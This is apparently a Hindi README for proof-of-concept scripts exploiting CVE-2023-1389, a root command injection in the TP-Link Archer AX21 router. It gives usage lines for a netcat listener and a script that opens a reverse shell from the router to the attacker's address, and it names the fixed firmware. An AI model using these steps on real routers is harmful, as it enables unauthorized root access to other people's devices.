
CVE-2023-1389 के लिए प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट, जो TP-Link Archer AX21 में एक अनप्रमाणित कमांड इंजेक्शन है, जो फ़ाइल स्थानांतरण और रिवर्स शेल क्षमताएँ प्रदान करती है।
CVE-2023–1389 TP-Link Archer AX21 WiFi राउटर में एक बिना प्रमाणीकरण वाली कमांड इंजेक्शन भेद्यता है। country पैरामीटर में एक कॉलबैक popen() फ़ंक्शन का उपयोग करता है, जो रूट के रूप में चलता है, जिससे हमलावर प्रमाणीकरण की आवश्यकता के बिना, प्रशासनिक इंटरफ़ेस पर GET या POST अनुरोधों के माध्यम से मनमाने मानों को इंजेक्ट कर सकता है। भेद्यता के बारे में अधिक जानकारी यहाँ पाई जा सकती है।
ये कुछ Proof-of-Concepts हैं जो मैंने कमांड इंजेक्शन का पता लगाते समय बनाए थे। Archer-file-transfer.py पहला संस्करण था और यह जिस तरह से इंटरैक्शन प्राप्त करता है वह काफी जटिल है। Archer-rev-shell.py आपको एक सरल netcat रिवर्स शेल देता है, और संभवतः आप इसी के लिए यहाँ आए हैं। यदि आप इन स्क्रिप्ट्स के विकास के बारे में अधिक जानना चाहते हैं तो आप पोस्ट यहाँ पढ़ सकते हैं।
एक टर्मिनल विंडो में:
nc your_IP listener_port
दूसरे टर्मिनल विंडो में:
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port
TP-Link ने फर्मवेयर संस्करण 1.1.4 Build 20230219 जारी किया है जो कमजोर कॉलबैक को हटाकर समस्या का समाधान करता है। अपने राउटर को नवीनतम फर्मवेयर में अपडेट करने से आपका डिवाइस सुरक्षित रहना चाहिए।
मैं संभवतः इन PoCs को बनाए नहीं रखूँगा। दोनों काफी सरल हैं और आवश्यकतानुसार संशोधित करना आसान होना चाहिए।